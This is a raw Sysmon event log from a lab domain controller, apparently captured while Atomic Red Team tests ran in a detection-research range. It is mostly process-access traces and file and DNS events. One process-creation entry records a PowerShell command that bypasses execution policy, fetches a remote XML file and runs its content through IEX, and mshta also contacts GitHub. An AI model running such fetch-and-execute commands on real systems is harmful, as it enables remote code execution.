14:08:03.205{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203556Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:03.205{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203555Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:03.205{5ABCFE62-99F1-603E-7907-00000000AD01}30806064C:\Windows\system32\csrss.exe{5ABCFE62-E9C3-6040-504E-00000000AD01}3396C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002203554Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:03.205{5ABCFE62-D502-6040-CD4B-00000000AD01}67326356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5ABCFE62-E9C3-6040-504E-00000000AD01}3396C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f3743(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f35b7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c675de3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5ec19f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5d0a5392(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5b4997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c612e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f635c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5e82e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c621471(wow64) 154100x80000000000000002203553Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:03.215{5ABCFE62-E9C3-6040-504E-00000000AD01}3396C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.xml');$Xml.command.a.execute | IEX"" C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{5ABCFE62-99F3-603E-CE9A-500000000000}0x509ace2HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{5ABCFE62-D502-6040-CD4B-00000000AD01}6732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x80000000000000002203552Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:03.205{5ABCFE62-D502-6040-CD4B-00000000AD01}6732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-err.txt2021-03-04 14:07:47.393 11241100x80000000000000002203551Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:03.205{5ABCFE62-D502-6040-CD4B-00000000AD01}6732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-out.txt2021-03-04 14:07:47.393 23542300x80000000000000002203550Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:03.127{5ABCFE62-E9C2-6040-4E4E-00000000AD01}2808ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002203549Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:03.002{5ABCFE62-E9C2-6040-4F4E-00000000AD01}42686196C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203644Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:04.596{5ABCFE62-99F5-603E-8E07-00000000AD01}25764808C:\Windows\Explorer.EXE{5ABCFE62-E9C0-6040-494E-00000000AD01}4604C:\Windows\SYSTEM32\Notepad.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+aecdf|C:\Windows\System32\SHELL32.dll+b0aa5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203643Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:04.596{5ABCFE62-99F5-603E-8E07-00000000AD01}25764808C:\Windows\Explorer.EXE{5ABCFE62-E9C0-6040-494E-00000000AD01}4604C:\Windows\SYSTEM32\Notepad.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b09be|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203642Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:04.596{5ABCFE62-99F5-603E-8E07-00000000AD01}25764808C:\Windows\Explorer.EXE{5ABCFE62-E9C0-6040-494E-00000000AD01}4604C:\Windows\SYSTEM32\Notepad.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+aef34|C:\Windows\System32\SHELL32.dll+b0987|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203641Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:04.330{5ABCFE62-842F-603E-1200-00000000AD01}3921604C:\Windows\system32\svchost.exe{5ABCFE62-E9C3-6040-554E-00000000AD01}436C:\Windows\system32\mshta.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6c14|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203640Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:04.330{5ABCFE62-842F-603E-1200-00000000AD01}3921604C:\Windows\system32\svchost.exe{5ABCFE62-E9C3-6040-554E-00000000AD01}436C:\Windows\system32\mshta.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6c14|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002203639Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:04.330{5ABCFE62-99F4-603E-8807-00000000AD01}644ATTACKRANGE\AdministratorC:\Windows\system32\taskhostw.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\INetCache\IE\H8VO9L1W\warning[1]MD5=124A9E7B6976F7570134B7034EE28D2B,SHA256=5F95EFF2BCAAEA82D0AE34A007DE3595C0D830AC4810EA4854E6526E261108E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203638Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:04.315{5ABCFE62-E9C3-6040-554E-00000000AD01}436ATTACKRANGE\AdministratorC:\Windows\system32\mshta.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\INetCache\IE\GFGOTAF7\warning[1]MD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002203637Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:04.315{5ABCFE62-842F-603E-1200-00000000AD01}3921604C:\Windows\system32\svchost.exe{5ABCFE62-E9C3-6040-554E-00000000AD01}436C:\Windows\system32\mshta.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6c14|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002203636Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:04.315{5ABCFE62-99F4-603E-8807-00000000AD01}644ATTACKRANGE\AdministratorC:\Windows\system32\taskhostw.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\INetCache\IE\GFGOTAF7\error[1]MD5=B9BEC45642FF7A2588DC6CB4131EA833,SHA256=B0ABE318200DCDE42E2125DF1F0239AE1EFA648C742DBF9A5B0D3397B903C21D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203635Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:04.315{5ABCFE62-E9C3-6040-554E-00000000AD01}436ATTACKRANGE\AdministratorC:\Windows\system32\mshta.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\INetCache\IE\MGHBP6C9\error[1]MD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203634Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:04.315{5ABCFE62-99F4-603E-8807-00000000AD01}644ATTACKRANGE\AdministratorC:\Windows\system32\taskhostw.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\INetCache\IE\MGHBP6C9\error[1]MD5=16AA7C3BEBF9C1B84C9EE07666E3207F,SHA256=7990E703AE060C241EBA6257D963AF2ECF9C6F3FBDB57264C1D48DDA8171E754,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203633Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:04.315{5ABCFE62-E9C3-6040-554E-00000000AD01}436ATTACKRANGE\AdministratorC:\Windows\system32\mshta.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\INetCache\IE\LQZQ07P7\error[1]MD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002203632Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:00.870{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60713-false10.0.1.12-8000- 23542300x80000000000000002203631Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:04.284{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F029A92DC4338C9D1D12415875BC90D5,SHA256=E3414F983CDD751322829D4C40BEE8AF36C5BB985794B7F38F11D34B8C8E1929,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203630Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:04.205{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=33DCB23276ED806A77B29ED34EEEDA50,SHA256=58E1F5D4E156D1D1CDF6DFF537F3E54C19D3D08CA4519C9696A33D0A1F2BF73B,IMPHASH=00000000000000000000000000000000falsetrue 22542200x80000000000000002203629Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:00.756{00000000-0000-0000-0000-000000000000}2808raw.githubusercontent.com0::ffff:185.199.109.133;::ffff:185.199.110.133;::ffff:185.199.108.133;::ffff:185.199.111.133;<unknown process> 22542200x80000000000000002203628Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:00.261{00000000-0000-0000-0000-000000000000}4764raw.githubusercontent.com0::ffff:185.199.109.133;::ffff:185.199.110.133;::ffff:185.199.108.133;::ffff:185.199.111.133;<unknown process> 23542300x80000000000000002203627Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:04.159{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=E0DDB41AC0CB5C9F8AEA3DF280528BFC,SHA256=CF0280607736BDA0A22C2096C828BC2A82C85E686417BCC06F77C49D1D1AD7F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203626Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:04.065{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=61F20D6E8E8CB61B52AFAE046F4A3B43,SHA256=32A8CFF48F788645B65A67C0401855A675E58EBAC36051E98E85A3D11858288B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002203625Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:03.987{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-842F-603E-0F00-00000000AD01}296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203656Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:05.768{5ABCFE62-99F5-603E-8E07-00000000AD01}25764808C:\Windows\Explorer.EXE{5ABCFE62-D502-6040-CD4B-00000000AD01}6732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+16679|C:\Windows\System32\SHELL32.dll+af480|C:\Windows\System32\SHELL32.dll+b0987|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203655Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:05.768{5ABCFE62-99F5-603E-8E07-00000000AD01}25764808C:\Windows\Explorer.EXE{5ABCFE62-D502-6040-CD4B-00000000AD01}6732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+aef34|C:\Windows\System32\SHELL32.dll+b0987|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203654Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:05.768{5ABCFE62-99F5-603E-8E07-00000000AD01}25762324C:\Windows\Explorer.EXE{5ABCFE62-D502-6040-CE4B-00000000AD01}1376C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+aecdf|C:\Windows\System32\SHELL32.dll+b0420|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203653Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:05.768{5ABCFE62-99F5-603E-8E07-00000000AD01}25762324C:\Windows\Explorer.EXE{5ABCFE62-D502-6040-CE4B-00000000AD01}1376C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+95ad0|C:\Windows\System32\SHELL32.dll+b03dc|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203652Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:05.768{5ABCFE62-99F5-603E-8E07-00000000AD01}25762324C:\Windows\Explorer.EXE{5ABCFE62-D502-6040-CE4B-00000000AD01}1376C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+aef34|C:\Windows\System32\SHELL32.dll+b03b0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203651Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:05.768{5ABCFE62-99F5-603E-8E07-00000000AD01}25762324C:\Windows\Explorer.EXE{5ABCFE62-D502-6040-CE4B-00000000AD01}1376C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002203650Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:05.330{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=143E4EE31F0D3BAEC5FFEACEDFC42428,SHA256=0D55EDDDE3EFEBA716BA2648C372147C47936F67B83EFD94E8AA1A2CB7EB4BFD,IMPHASH=00000000000000000000000000000000falsetrue 22542200x80000000000000002203649Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:01.858{5ABCFE62-E9C3-6040-554E-00000000AD01}436raw.githubusercontent.com0::ffff:185.199.109.133;::ffff:185.199.110.133;::ffff:185.199.108.133;::ffff:185.199.111.133;C:\Windows\system32\mshta.exe 10341000x80000000000000002203648Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 